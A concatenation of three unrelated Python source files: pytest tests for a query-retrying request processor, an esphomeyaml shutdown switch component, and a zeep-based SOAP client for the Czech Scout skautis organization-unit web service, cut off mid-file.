"pageType": "article"
}
},
"error": "Proxy error: internal_error",
},
]
# If we try to process this response,
# it should raise an exception again
with pytest.raises(_QueryError):
request_processor.process_results(second_response)
# Latest results should be equal to a combination of our two responses:
# successes from previous responses and most up to date errors.
assert request_processor.get_latest_results() == [
first_response[0],
second_response[0],
]
# Our pending queries list should contain our query with error
error_query = second_response[0]
assert "error" in error_query
user_query = error_query["query"]["userQuery"]
assert request_processor.pending_queries == [user_query]
# Given another response, this time with a success
third_response = [
{
"query": {
"id": "4",
"domain": "example.org",
"userQuery": {
"url": "https://example.org/second",
"pageType": "article"
}
},
"article": {
"name": "My second article",
},
},
]
# If we try to process this response
results = request_processor.process_results(third_response)
# Results should be equal to a combination of success results
# from previous and current requests
assert results == [
first_response[0],
third_response[0],
]
# Latest results should be equal to our response
assert request_processor.get_latest_results() == results
# Our pending queries list should be empty
# because there's no additional query to be retried
assert request_processor.pending_queries == []
@pytest.mark.parametrize("message, retry_seconds, domain_occupied", [
("Domain example.com is occupied, please retry in 23.5 seconds", 23.5, True,),
("Domain example.com is occupied, please retry in 14 seconds", 14.0, True,),
("Proxy error: timeout", 0.0, False,),
])
def test_request_processor_exception_priority(
message, retry_seconds, domain_occupied):
# Given an initial query with two items
initial_query = [
{
"url": "https://example.org/first",
"pageType": "article",
},
{
"url": "https://example.org/second",
"pageType": "article",
},
]
# Initialize our request processor with this query
request_processor = RequestProcessor(query=initial_query, max_retries=3)
# Since we haven't processed any response yet,
# our request processor should have:
#
# Empty results
assert request_processor.get_latest_results() == []
# Pending queries list equal to our initial query
assert request_processor.pending_queries == initial_query
# Given our first response with two errors
first_response = [
{
"query": {
"id": "1",
"domain": "example.org",
"userQuery": {
"url": "https://example.org/first",
"pageType": "article"
}
},
"error": message,
},
{
"query": {
"id": "2",
"domain": "example.org",
"userQuery": {
"url": "https://example.org/second",
"pageType": "article"
}
},
"error": "Proxy error: internal_error",
},
]
# If we try to process our response, a _QueryError should be raised
with pytest.raises(_QueryError) as exc_info:
request_processor.process_results(first_response)
assert bool(exc_info.value.domain_occupied) is domain_occupied
assert exc_info.value.retry_seconds == retry_seconds
# The same thing should happen if the order of the queries is inverted
first_response.reverse()
with pytest.raises(_QueryError) as exc_info:
request_processor.process_results(first_response)
assert bool(exc_info.value.domain_occupied) is domain_occupied
assert exc_info.value.retry_seconds == retry_seconds
|
import voluptuous as vol
import esphomeyaml.config_validation as cv
from esphomeyaml.components import switch
from esphomeyaml.const import CONF_INVERTED, CONF_MAKE_ID, CONF_NAME
from esphomeyaml.cpp_generator import variable
from esphomeyaml.cpp_types import Application, App
MakeShutdownSwitch = Application.struct('MakeShutdownSwitch')
ShutdownSwitch = switch.switch_ns.class_('ShutdownSwitch', switch.Switch)
PLATFORM_SCHEMA = cv.nameable(switch.SWITCH_PLATFORM_SCHEMA.extend({
cv.GenerateID(): cv.declare_variable_id(ShutdownSwitch),
cv.GenerateID(CONF_MAKE_ID): cv.declare_variable_id(MakeShutdownSwitch),
vol.Optional(CONF_INVERTED): cv.invalid("Shutdown switches do not support inverted mode!"),
}))
def to_code(config):
rhs = App.make_shutdown_switch(config[CONF_NAME])
shutdown = variable(config[CONF_MAKE_ID], rhs)
switch.setup_switch(shutdown.Pshutdown, shutdown.Pmqtt, config)
BUILD_FLAGS = '-DUSE_SHUTDOWN_SWITCH'
def to_hass_config(data, config):
return switch.core_to_hass_config(data, config)
|
# -*- coding: utf-8 -*-
import zeep
# Webová služba pro práci s organizačními jednotkami a osobami
class OrganizationUnit(object):
__module__ = 'skautis'
def __init__(self, test):
if test:
self._client = zeep.Client('https://test-is.skaut.cz/JunakWebservice/OrganizationUnit.asmx?wsdl')
else:
self._client = zeep.Client('https://is.skaut.cz/JunakWebservice/OrganizationUnit.asmx?wsdl')
# Upravit hospodářský výkaz
def StatementUpdate(self, ID_Login, ID, ID_Unit, Year, IsError, IsDelivered, DateDelivered, DateCreated, IsThousands, IsConsultant, ID_Document, ID_DocumentTempFile, DateSent, ID_PersonSent, DateConfirmed, ID_PersonConfirmed, ID_Registry, ShowOverview, Unit=None, RegistrationNumber=None, ID_StatementType=None, StatementType=None, ID_StatementState=None, StatementState=None, PersonSent=None, PersonConfirmed=None):
return self._client.service.StatementUpdate({"ID_Login": ID_Login, "ID": ID, "ID_Unit": ID_Unit, "Year": Year, "IsError": IsError, "IsDelivered": IsDelivered, "DateDelivered": DateDelivered, "DateCreated": DateCreated, "IsThousands": IsThousands, "IsConsultant": IsConsultant, "ID_Document": ID_Document, "ID_DocumentTempFile": ID_DocumentTempFile, "DateSent": DateSent, "ID_PersonSent": ID_PersonSent, "DateConfirmed": DateConfirmed, "ID_PersonConfirmed": ID_PersonConfirmed, "ID_Registry": ID_Registry, "ShowOverview": ShowOverview, "Unit": Unit, "RegistrationNumber": RegistrationNumber, "ID_StatementType": ID_StatementType, "StatementType": StatementType, "ID_StatementState": ID_StatementState, "StatementState": StatementState, "PersonSent": PersonSent, "PersonConfirmed": PersonConfirmed})
# Načíst seznam typů oddílu
def TroopArtAll(self, ID_Login, DisplayName=None):
return self._client.service.TroopArtAll({"ID_Login": ID_Login, "DisplayName": DisplayName})
# Načíst seznam jednotek
def UnitAll(self, ID_Login, ID_Application, ID, ID_Group, ID_UnitParent, ID_UnitChild, ID_UnitTree, RegistrationNumberStartWith, ID_AlignmentType, ID_UnitType=None, RegistrationNumber=None, DisplayName=None, Location=None, AccountNumber=None, IC=None):
return self._client.service.UnitAll({"ID_Login": ID_Login, "ID_Application": ID_Application, "ID": ID, "ID_Group": ID_Group, "ID_UnitParent": ID_UnitParent, "ID_UnitChild": ID_UnitChild, "ID_UnitTree": ID_UnitTree, "RegistrationNumberStartWith": RegistrationNumberStartWith, "ID_AlignmentType": ID_AlignmentType, "ID_UnitType": ID_UnitType, "RegistrationNumber": RegistrationNumber, "DisplayName": DisplayName, "Location": Location, "AccountNumber": AccountNumber, "IC": IC})
# Načíst seznam kontaktů jednotky
def UnitContactAll(self, ID_Login, ID_Application, ID_Unit, Publish, ID_ContactType=None):
return self._client.service.UnitContactAll({"ID_Login": ID_Login, "ID_Application": ID_Application, "ID_Unit": ID_Unit, "Publish": Publish, "ID_ContactType": ID_ContactType})
# Smazat kontakt jednotky
def UnitContactDelete(self, ID_Login, ID):
return self._client.service.UnitContactDelete({"ID_Login": ID_Login, "ID": ID})
# Založit kontakt jednotky
def UnitContactInsert(self, ID_Login, ID_Unit, ID, Publish, ID_ContactType=None, Value=None, Note=None):
return self._client.service.UnitContactInsert({"ID_Login": ID_Login, "ID_Unit": ID_Unit, "ID": ID, "Publish": Publish, "ID_ContactType": ID_ContactType, "Value": Value, "Note": Note})
# Upravit kontakt jednotky
def UnitContactUpdate(self, ID_Login, ID_Unit, ID, Publish, ID_ContactType=None, Value=None, Note=None):
return self._client.service.UnitContactUpdate({"ID_Login": ID_Login, "ID_Unit": ID_Unit, "ID": ID, "Publish": Publish, "ID_ContactType": ID_ContactType, "Value": Value, "Note": Note})
# Založit podřízenou jednotku
def UnitInsertUnit(self, ID_Login, ID, ID_Group, ID_Unit, ContainsMembers, CommissionDeadline, IsVatPayer, ID_TroopArt, CanUpdateRegistrationNumber, IsUnitCancel, JournalParent, ChangeFreeJournal, ID_UnitParent, OnlyValidate, IsPostalAuthenticated, IsAddressAuthenticated, ID_PersonChangeName, DateChangeName, IsPropertyOwner, ID_TempFilePropertyAgreement, ID_DocumentDecision, ID_DocumentPropertyAgreement, ID_TempFileSeatChange, ID_UnitType=None, UnitType=None, DisplayName=None, SortName=None, RegistrationNumber=None, ShortRegistrationNumber=None, Location=None, IC=None, DIC=None, FileReference=None, Street=None, City=None, Postcode=None, State=None, PostalFirstLine=None, PostalStreet=None, PostalCity=None, PostalPostcode=None, PostalState=None, Note=None, TroopArt=None, LogoContent=None, LogoExtension=None, AddressDistrict=None, PostalDistrict=None, NewDisplayName=None, CompleteDisplayName=None, PersonChangeName=None, PropertyAgreementExtension=None, PropertyAgreementContent=None, TroopArtKey=None, ID_JournalNovice=None, ID_JournalDeliveryType=None, FullDisplayName=None, DecisionSeatChangeExtension=None, ShopDiscountBarcode=None, ID_UnitFoundReason=None, UnitFoundReason=None, UnitFoundDescription=None):
return self._client.service.UnitInsertUnit({"ID_Login": ID_Login, "ID": ID, "ID_Group": ID_Group, "ID_Unit": ID_Unit, "ContainsMembers": ContainsMembers, "CommissionDeadline": CommissionDeadline, "IsVatPayer": IsVatPayer, "ID_TroopArt": ID_TroopArt, "CanUpdateRegistrationNumber": CanUpdateRegistrationNumber, "IsUnitCancel": IsUnitCancel, "JournalParent": JournalParent, "ChangeFreeJournal": ChangeFreeJournal, "ID_UnitParent": ID_UnitParent, "OnlyValidate": OnlyValidate, "IsPostalAuthenticated": IsPostalAuthenticated, "IsAddressAuthenticated": IsAddressAuthenticated, "ID_PersonChangeName": ID_PersonChangeName, "DateChangeName": DateChangeName, "IsPropertyOwner": IsPropertyOwner, "ID_TempFilePropertyAgreement": ID_TempFilePropertyAgreement, "ID_DocumentDecision": ID_DocumentDecision, "ID_DocumentPropertyAgreement": ID_DocumentPropertyAgreement, "ID_TempFileSeatChange": ID_TempFileSeatChange, "ID_UnitType": ID_UnitType, "UnitType": UnitType, "DisplayName": DisplayName, "SortName": SortName, "RegistrationNumber": RegistrationNumber, "ShortRegistrationNumber": ShortRegistrationNumber, "Location": Location, "IC": IC, "DIC": DIC, "FileReference": FileReference, "Street": Street, "City": City, "Postcode": Postcode, "State": State, "PostalFirstLine": PostalFirstLine, "PostalStreet": PostalStreet, "PostalCity": PostalCity, "PostalPostcode": PostalPostcode, "PostalState": PostalState, "Note": Note, "TroopArt": TroopArt, "LogoContent": LogoContent, "LogoExtension": LogoExtension, "AddressDistrict": AddressDistrict, "PostalDistrict": PostalDistrict, "NewDisplayName": NewDisplayName, "CompleteDisplayName": CompleteDisplayName, "PersonChangeName": PersonChangeName, "PropertyAgreementExtension": PropertyAgreementExtension, "PropertyAgreementContent": PropertyAgreementContent, "TroopArtKey": TroopArtKey, "ID_JournalNovice": ID_JournalNovice, "ID_JournalDeliveryType": ID_JournalDeliveryType, "FullDisplayName": FullDisplayName, "DecisionSeatChangeExtension": DecisionSeatChangeExtension, "ShopDiscountBarcode": ShopDiscountBarcode, "ID_UnitFoundReason": ID_UnitFoundReason, "UnitFoundReason": UnitFoundReason, "UnitFoundDescription": UnitFoundDescription})
# Smazat registrační vadu jednotky
def UnitMistakeReportDelete(self, ID_Login, ID):
return self._client.service.UnitMistakeReportDelete({"ID_Login": ID_Login, "ID": ID})
# Založit registrační vadu jednotky
def UnitMistakeReportInsert(self, ID_Login, ID, ID_Unit, ID_Mistake, Unit=None, RegistrationNumber=None, Mistake=None, DisplayName=None, ParentComment=None):
return self._client.service.UnitMistakeReportInsert({"ID_Login": ID_Login, "ID": ID, "ID_Unit": ID_Unit, "ID_Mistake": ID_Mistake, "Unit": Unit, "RegistrationNumber": RegistrationNumber, "Mistake": Mistake, "DisplayName": DisplayName, "ParentComment": ParentComment})
# Načíst seznam registrací jednotky
def UnitRegistrationAll(self, ID_Login, ID_Unit, Year):
return self._client.service.UnitRegistrationAll({"ID_Login": ID_Login, "ID_Unit": ID_Unit, "Year": Year})
# Provede kontrolu zadané registrace jednotky a vrátí nalezené vady
def UnitRegistrationCheck(self, ID_Login, ID):
return self._client.service.UnitRegistrationCheck({"ID_Login": ID_Login, "ID": ID})
# Načíst detail registrace jednotky
def UnitRegistrationDetail(self, ID_Login, ID, ID_Unit, Year, Instructions=None):
return self._client.service.UnitRegistrationDetail({"ID_Login": ID_Login, "ID": ID, "ID_Unit": ID_Unit, "Year": Year, "Instructions": Instructions})
# Založit registraci jednotky
def UnitRegistrationInsert(self, ID_Login, ID, ID_Unit, Year, DateChecked, DateConfirmed, IsDelivered, IsAccepted, ID_UnitRegistrationParent, ParentIsDelivered, ParentIsAccepted, ParentHasCreated, Unit=None, RegistrationNumber=None, DisplayName=None, ID_UnitType=None, Instructions=None, UnitRegistrationParent=None, InstructionsParent=None):
return self._client.service.UnitRegistrationInsert({"ID_Login": ID_Login, "ID": ID, "ID_Unit": ID_Unit, "Year": Year, "DateChecked": DateChecked, "DateConfirmed": DateConfirmed, "IsDelivered": IsDelivered, "IsAccepted": IsAccepted, "ID_UnitRegistrationParent": ID_UnitRegistrationParent, "ParentIsDelivered": ParentIsDelivered, "ParentIsAccepted": ParentIsAccepted, "ParentHasCreated": ParentHasCreated, "Unit": Unit, "RegistrationNumber": RegistrationNumber, "DisplayName": DisplayName, "ID_UnitType": ID_UnitType, "Instructions": Instructions, "UnitRegistrationParent": UnitRegistrationParent, "InstructionsParent": InstructionsParent})
# Upravit registraci jednotky
def UnitRegistrationUpdate(self, ID_Login, ID, ID_Unit, Year, DateChecked, DateConfirmed, IsDelivered, IsAccepted, ID_UnitRegistrationParent, ParentIsDelivered, ParentIsAccepted, ParentHasCreated, Unit=None, RegistrationNumber=None, DisplayName=None, ID_UnitType=None, Instructions=None, UnitRegistrationParent=None, InstructionsParent=None):
return self._client.service.UnitRegistrationUpdate({"ID_Login": ID_Login, "ID": ID, "ID_Unit": ID_Unit, "Year": Year, "DateChecked": DateChecked, "DateConfirmed": DateConfirmed, "IsDelivered": IsDelivered, "IsAccepted": IsAccepted, "ID_UnitRegistrationParent": ID_UnitRegistrationParent, "ParentIsDelivered": ParentIsDelivered, "ParentIsAccepted": ParentIsAccepted, "ParentHasCreated": ParentHasCreated, "Unit": Unit, "RegistrationNumber": RegistrationNumber, "DisplayName": DisplayName, "ID_UnitType": ID_UnitType, "Instructions": Instructions, "UnitRegistrationParent": UnitRegistrationParent, "InstructionsParent": InstructionsParent})
# Načíst seznam podřízených jednotek
def UnitTreeAll(self, ID_Login, ID_Application, ID_UnitParent, ShowHistory, IsValid):
return self._client.service.UnitTreeAll({"ID_Login": ID_Login, "ID_Application": ID_Application, "ID_UnitParent": ID_UnitParent, "ShowHistory": ShowHistory, "IsValid": IsValid})
# Načíst detail existence jednotky
def UnitTreeDetail(self, ID_Login, ID):
return self._client.service.UnitTreeDetail({"ID_Login": ID_Login, "ID": ID})
# Načíst seznam důvodů ukončení existence
def UnitTreeReasonAll(self, ID_Login, DisplayName=None):
return self._client.service.UnitTreeReasonAll({"ID_Login": ID_Login, "DisplayName": DisplayName})
# Ukončit existenci jednotky
def UnitTreeUpdate(self, ID_Login, ID, ValidFrom, ValidTo, ID_Unit, ID_UnitParent, ID_UnitMerge, ID_UnitTreeReason=None, Unit=None, UnitParent=None, RegistrationNumber=None, ID_UnitType=None, UnitMerge=None, ID_UnitFoundReason=None, UnitFoundReason=None, UnitFoundDescription=None):
return self._client.service.UnitTreeUpdate({"ID_Login": ID_Login, "ID": ID, "ValidFrom": ValidFrom, "ValidTo": ValidTo, "ID_Unit": ID_Unit, "ID_UnitParent": ID_UnitParent, "ID_UnitMerge": ID_UnitMerge, "ID_UnitTreeReason": ID_UnitTreeReason, "Unit": Unit, "UnitParent": UnitParent, "RegistrationNumber": RegistrationNumber, "ID_UnitType": ID_UnitType, "UnitMerge": UnitMerge, "ID_UnitFoundReason": ID_UnitFoundReason, "UnitFoundReason": UnitFoundReason, "UnitFoundDescription": UnitFoundDescription})
# Načíst seznam typů jednotek
def UnitTypeAll(self, ID_Login, DisplayName=None, ID_UnitTypeCreate=None, ID_UnitTypeParent=None):
return self._client.service.UnitTypeAll({"ID_Login": ID_Login, "DisplayName": DisplayName, "ID_UnitTypeCreate": ID_UnitTypeCreate, "ID_UnitTypeParent": ID_UnitTypeParent})
# Upravit jednotku
def UnitUpdate(self, ID_Login, ID, ID_Group, ID_Unit, ContainsMembers, CommissionDeadline, IsVatPayer, ID_TroopArt, CanUpdateRegistrationNumber, IsUnitCancel, JournalParent, ChangeFreeJournal, ID_UnitParent, OnlyValidate, IsPostalAuthenticated, IsAddressAuthenticated, ID_PersonChangeName, DateChangeName, IsPropertyOwner, ID_TempFilePropertyAgreement, ID_DocumentDecision, ID_DocumentPropertyAgreement, ID_TempFileSeatChange, ID_UnitType=None, UnitType=None, DisplayName=None, SortName=None, RegistrationNumber=None, ShortRegistrationNumber=None, Location=None, IC=None, DIC=None, FileReference=None, Street=None, City=None, Postcode=None, State=None, PostalFirstLine=None, PostalStreet=None, PostalCity=None, PostalPostcode=None, PostalState=None, Note=None, TroopArt=None, LogoContent=None, LogoExtension=None, AddressDistrict=None, PostalDistrict=None, NewDisplayName=None, CompleteDisplayName=None, PersonChangeName=None, PropertyAgreementExtension=None, PropertyAgreementContent=None, TroopArtKey=None, ID_JournalNovice=None, ID_JournalDeliveryType=None, FullDisplayName=None, DecisionSeatChangeExtension=None, ShopDiscountBarcode=None, ID_UnitFoundReason=None, UnitFoundReason=None, UnitFoundDescription=None):
return self._client.service.UnitUpdate({"ID_Login": ID_Login, "ID": ID, "ID_Group": ID_Group, "ID_Unit": ID_Unit, "ContainsMembers": ContainsMembers, "CommissionDeadline": CommissionDeadline, "IsVatPayer": IsVatPayer, "ID_TroopArt": ID_TroopArt, "CanUpdateRegistrationNumber": CanUpdateRegistrationNumber, "IsUnitCancel": IsUnitCancel, "JournalParent": JournalParent, "ChangeFreeJournal": ChangeFreeJournal, "ID_UnitParent": ID_UnitParent, "OnlyValidate": OnlyValidate, "IsPostalAuthenticated": IsPostalAuthenticated, "IsAddressAuthenticated": IsAddressAuthenticated, "ID_PersonChangeName": ID_PersonChangeName, "DateChangeName": DateChangeName, "IsPropertyOwner": IsPropertyOwner, "ID_TempFilePropertyAgreement": ID_TempFilePropertyAgreement, "ID_DocumentDecision": ID_DocumentDecision, "ID_DocumentPropertyAgreement": ID_DocumentPropertyAgreement, "ID_TempFileSeatChange": ID_TempFileSeatChange, "ID_UnitType": ID_UnitType, "UnitType": UnitType, "DisplayName": DisplayName, "SortName": SortName, "RegistrationNumber": RegistrationNumber, "ShortRegistrationNumber": ShortRegistrationNumber, "Location": Location, "IC": IC, "DIC": DIC, "FileReference": FileReference, "Street": Street, "City": City, "Postcode": Postcode, "State": State, "PostalFirstLine": PostalFirstLine, "PostalStreet": PostalStreet, "PostalCity": PostalCity, "PostalPostcode": PostalPostcode, "PostalState": PostalState, "Note": Note, "TroopArt": TroopArt, "LogoContent": LogoContent, "LogoExtension": LogoExtension, "AddressDistrict": AddressDistrict, "PostalDistrict": PostalDistrict, "NewDisplayName": NewDisplayName, "CompleteDisplayName": CompleteDisplayName, "PersonChangeName": PersonChangeName, "PropertyAgreementExtension": PropertyAgreementExtension, "PropertyAgreementContent": PropertyAgreementContent, "TroopArtKey": TroopArtKey, "ID_JournalNovice": ID_JournalNovice, "ID_JournalDeliveryType": ID_JournalDeliveryType, "FullDisplayName": FullDisplayName, "DecisionSeatChangeExtension": DecisionSeatChangeExtension, "ShopDiscountBarcode": ShopDiscountBarcode, "ID_UnitFoundReason": ID_UnitFoundReason, "UnitFoundReason": UnitFoundReason, "UnitFoundDescription": UnitFoundDescription})
# Přiřadit osobě uživatelský účet
def PersonUpdateUser(self, ID_Login, ID, Overwrite, UserName=None, SecurityCode=None):
return self._client.service.PersonUpdateUser({"ID_Login": ID_Login, "ID": ID, "Overwrite": Overwrite, "UserName": UserName, "SecurityCode": SecurityCode})
# Načtení informací o osobě
def PersonDetail(self, ID_Login, ID):
return self._client.service.PersonDetail({"ID_Login": ID_Login, "ID": ID})
# Načtení informací o jednotce
def UnitDetail(self, ID_Login, ID_Application, ID, FindStredisko, FindUstredi):
return self._client.service.UnitDetail({"ID_Login": ID_Login, "ID_Application": ID_Application, "ID": ID, "FindStredisko": FindStredisko, "FindUstredi": FindUstredi})
# Načte fotografii osoby
def PersonPhoto(self, ID_Login, ID, Size=None):
return self._client.service.PersonPhoto({"ID_Login": ID_Login, "ID": ID, "Size": Size})
# Načíst obsazení funkcí v jednotce pro zobrazení v registru OJ
def FunctionAllRegistry(self, ID_Login, ID_Application, ID_Unit, ReturnStatutory, ReturnAssistant, ReturnContact):
return self._client.service.FunctionAllRegistry({"ID_Login": ID_Login, "ID_Application": ID_Application, "ID_Unit": ID_Unit, "ReturnStatutory": ReturnStatutory, "ReturnAssistant": ReturnAssistant, "ReturnContact": ReturnContact})
# Načíst seznam termínů schůzek
def MeetingDateAll(self, ID_Login, ID_Application, ID_Unit, ID_Occupation, ID_WeekDay=None):
return self._client.service.MeetingDateAll({"ID_Login": ID_Login, "ID_Application": ID_Application, "ID_Unit": ID_Unit, "ID_Occupation": ID_Occupation, "ID_WeekDay": ID_WeekDay})
# Smazat termín schůzek
def MeetingDateDelete(self, ID_Login, ID):
return self._client.service.MeetingDateDelete({"ID_Login": ID_Login, "ID": ID})
# Načíst detail termínu schůzek
def MeetingDateDetail(self, ID_Login, ID):
return self._client.service.MeetingDateDetail({"ID_Login": ID_Login, "ID": ID})
# Založit termín schůzek
def MeetingDateInsert(self, ID_Login, ID, ID_Unit, ID_Occupation, DisplayName=None, Unit=None, ID_WeekDay=None, WeekDay=None, TimeFrom=None, TimeTo=None, Periodicity=None, Occupation=None):
return self._client.service.MeetingDateInsert({"ID_Login": ID_Login, "ID": ID, "ID_Unit": ID_Unit, "ID_Occupation": ID_Occupation, "DisplayName": DisplayName, "Unit": Unit, "ID_WeekDay": ID_WeekDay, "WeekDay": WeekDay, "TimeFrom": TimeFrom, "TimeTo": TimeTo, "Periodicity": Periodicity, "Occupation": Occupation})
# Upravit termín schůzek
def MeetingDateUpdate(self, ID_Login, ID, ID_Unit, ID_Occupation, DisplayName=None, Unit=None, ID_WeekDay=None, WeekDay=None, TimeFrom=None, TimeTo=None, Periodicity=None, Occupation=None):
return self._client.service.MeetingDateUpdate({"ID_Login": ID_Login, "ID": ID, "ID_Unit": ID_Unit, "ID_Occupation": ID_Occupation, "DisplayName": DisplayName, "Unit": Unit, "ID_WeekDay": ID_WeekDay, "WeekDay": WeekDay, "TimeFrom": TimeFrom, "TimeTo": TimeTo, "Periodicity": Periodicity, "Occupation": Occupation})
# Hledání v registru OJ
def UnitAllRegistry(self, ID_Login, ID_Application, IsValid, DisplayName=None, IC=None, RegistrationNumber=None, Location=None, ParentDisplayName=None, ParentRegistrationNumber=None):
return self._client.service.UnitAllRegistry({"ID_Login": ID_Login, "ID_Application": ID_Application, "IsValid": IsValid, "DisplayName": DisplayName, "IC": IC, "RegistrationNumber": RegistrationNumber, "Location": Location, "ParentDisplayName": ParentDisplayName, "ParentRegistrationNumber": ParentRegistrationNumber})
# Načíst seznam zrušení jednotky
def UnitCancelAll(self, ID_Login, ID_Application, ID_Unit, ID_Person, IsValid, ID_UnitCancelType=None):
return self._client.service.UnitCancelAll({"ID_Login": ID_Login, "ID_Application": ID_Application, "ID_Unit": ID_Unit, "ID_Person": ID_Person, "IsValid": IsValid, "ID_UnitCancelType": ID_UnitCancelType})
# Založit zrušení jednotky
def UnitCancelInsert(self, ID_Login, ID, ID_Unit, DateDecision, ID_Person, ValidTo, Unit=None, ID_UnitCancelType=None, UnitCancelType=None, Description=None, Person=None):
return self._client.service.UnitCancelInsert({"ID_Login": ID_Login, "ID": ID, "ID_Unit": ID_Unit, "DateDecision": DateDecision, "ID_Person": ID_Person, "ValidTo": ValidTo, "Unit": Unit, "ID_UnitCancelType": ID_UnitCancelType, "UnitCancelType": UnitCancelType, "Description": Description, "Person": Person})
# Načíst seznam typů rozhodnutí
def UnitCancelTypeAll(self, ID_Login, ID_Unit, DisplayName=None):
return self._client.service.UnitCancelTypeAll({"ID_Login": ID_Login, "ID_Unit": ID_Unit, "DisplayName": DisplayName})
# Přehled počtu členů podle poslední uzavřené registrace
def UnitDetailMembersRegistry(self, ID_Login, ID_Application, ID):
return self._client.service.UnitDetailMembersRegistry({"ID_Login": ID_Login, "ID_Application": ID_Application, "ID": ID})
# Zobrazit detail jednotky v registru OJ
def UnitDetailRegistry(self, ID_Login, ID_Application, ID):
return self._client.service.UnitDetailRegistry({"ID_Login": ID_Login, "ID_Application": ID_Application, "ID": ID})
# Načte logo jednotky
def UnitLogo(self, ID_Login, ID_Application, ID):
return self._client.service.UnitLogo({"ID_Login": ID_Login, "ID_Application": ID_Application, "ID": ID})
# Statistika členů a jednotek v registraci
def UnitRegistrationMembers(self, ID_Login, ID):
return self._client.service.UnitRegistrationMembers({"ID_Login": ID_Login, "ID": ID})
# Načíst seznam hospodářských výkazů
def StatementErrors(self, ID_Login, ID):
return self._client.service.StatementErrors({"ID_Login": ID_Login, "ID": ID})
# Spočítat, zda hospodářský výkaz obsahuje chyby
def StatementComputeIsError(self, ID_Login, ID, ID_Unit, Year, IsError, IsDelivered, DateDelivered, DateCreated, IsThousands, IsConsultant, ID_Document, ID_DocumentTempFile, DateSent, ID_PersonSent, DateConfirmed, ID_PersonConfirmed, ID_Registry, ShowOverview, Unit=None, RegistrationNumber=None, ID_StatementType=None, StatementType=None, ID_StatementState=None, StatementState=None, PersonSent=None, PersonConfirmed=None):
return self._client.service.StatementComputeIsError({"ID_Login": ID_Login, "ID": ID, "ID_Unit": ID_Unit, "Year": Year, "IsError": IsError, "IsDelivered": IsDelivered, "DateDelivered": DateDelivered, "DateCreated": DateCreated, "IsThousands": IsThousands, "IsConsultant": IsConsultant, "ID_Document": ID_Document, "ID_DocumentTempFile": ID_DocumentTempFile, "DateSent": DateSent, "ID_PersonSent": ID_PersonSent, "DateConfirmed": DateConfirmed, "ID_PersonConfirmed": ID_PersonConfirmed, "ID_Registry": ID_Registry, "ShowOverview": ShowOverview, "Unit": Unit, "RegistrationNumber": RegistrationNumber, "ID_StatementType": ID_StatementType, "StatementType": StatementType, "ID_StatementState": ID_StatementState, "StatementState": StatementState, "PersonSent": PersonSent, "PersonConfirmed": PersonConfirmed})
# Načíst seznam hospodářských výkazů podřízených jednotek
def StatementAllChild(self, ID_Login, ID):
return self._client.service.StatementAllChild({"ID_Login": ID_Login, "ID": ID})
# Načíst seznam položek hospodářského výkazu včetně součtů oblastí
def StatementEntryAllTotals(self, ID_Login, ID_Statement, ID_StatementEntryType, IsMoney):
return self._client.service.StatementEntryAllTotals({"ID_Login": ID_Login, "ID_Statement": ID_Statement, "ID_StatementEntryType": ID_StatementEntryType, "IsMoney": IsMoney})
# Obnovit existenci jednotky
def UnitTreeRenew(self, ID_Login, ID, ValidFrom, ValidTo, ID_Unit, ID_UnitParent, ID_UnitMerge, ID_UnitTreeReason=None, Unit=None, UnitParent=None, RegistrationNumber=None, ID_UnitType=None, UnitMerge=None, ID_UnitFoundReason=None, UnitFoundReason=None, UnitFoundDescription=None):
return self._client.service.UnitTreeRenew({"ID_Login": ID_Login, "ID": ID, "ValidFrom": ValidFrom, "ValidTo": ValidTo, "ID_Unit": ID_Unit, "ID_UnitParent": ID_UnitParent, "ID_UnitMerge": ID_UnitMerge, "ID_UnitTreeReason": ID_UnitTreeReason, "Unit": Unit, "UnitParent": UnitParent, "RegistrationNumber": RegistrationNumber, "ID_UnitType": ID_UnitType, "UnitMerge": UnitMerge, "ID_UnitFoundReason": ID_UnitFoundReason, "UnitFoundReason": UnitFoundReason, "UnitFoundDescription": UnitFoundDescription})
# Načíst detail vady registrace
def MistakeDetail(self, ID_Login, ID):
return self._client.service.MistakeDetail({"ID_Login": ID_Login, "ID": ID})
# Ověření, zda lze osobu převést do zadané jednotky
def PersonDetailIdentificationCode(self, ID_Login, ID_Unit, IdentificationCode=None):
return self._client.service.PersonDetailIdentificationCode({"ID_Login": ID_Login, "ID_Unit": ID_Unit, "IdentificationCode": IdentificationCode})
# Načíst seznam jednotek ve stejném středisku a nebo všech podřízených
def UnitAllUnit(self, ID_Login, ID_Unit, SearchStredisko):
return self._client.service.UnitAllUnit({"ID_Login": ID_Login, "ID_Unit": ID_Unit, "SearchStredisko": SearchStredisko})
# Obnovit členství osoby v jednotce
def MembershipRenew(self, ID_Login, ID, ID_Unit, ID_Person, ID_User, ValidFrom, ValidTo, IsUnique, CreateNew, OnlyValidate, IsFunction, IsUnitFunction, IsSts, IsDelegate, PersonDateBirth, Person=None, ID_MembershipType=None, ID_MembershipCategory=None, ID_MembershipReason=None):
return self._client.service.MembershipRenew({"ID_Login": ID_Login, "ID": ID, "ID_Unit": ID_Unit, "ID_Person": ID_Person, "ID_User": ID_User, "ValidFrom": ValidFrom, "ValidTo": ValidTo, "IsUnique": IsUnique, "CreateNew": CreateNew, "OnlyValidate": OnlyValidate, "IsFunction": IsFunction, "IsUnitFunction": IsUnitFunction, "IsSts": IsSts, "IsDelegate": IsDelegate, "PersonDateBirth": PersonDateBirth, "Person": Person, "ID_MembershipType": ID_MembershipType, "ID_MembershipCategory": ID_MembershipCategory, "ID_MembershipReason": ID_MembershipReason})
# Hledání osob (helpdesk)
def PersonAllHelpdesk(self, ID_Login, IsValid, FirstName=None, LastName=None, NickName=None, IdentificationCode=None, City=None, UserName=None, Email=None, Phone=None):
return self._client.service.PersonAllHelpdesk({"ID_Login": ID_Login, "IsValid": IsValid, "FirstName": FirstName, "LastName": LastName, "NickName": NickName, "IdentificationCode": IdentificationCode, "City": City, "UserName": UserName, "Email": Email, "Phone": Phone})
# Načíst seznam žádostí o převod
def RequestAll(self, ID_Login, ID_Person, ID_UserCreate, ID_Unit, ID_UserDecision, ID_MembershipType=None, ID_MembershipCategory=None, ID_RequestState=None):
return self._client.service.RequestAll({"ID_Login": ID_Login, "ID_Person": ID_Person, "ID_UserCreate": ID_UserCreate, "ID_Unit": ID_Unit, "ID_UserDecision": ID_UserDecision, "ID_MembershipType": ID_MembershipType, "ID_MembershipCategory": ID_MembershipCategory, "ID_RequestState": ID_RequestState})
# Načíst detail žádosti o převod
def RequestDetail(self, ID_Login, ID):
return self._client.service.RequestDetail({"ID_Login": ID_Login, "ID": ID})
# Založit žádost o převod
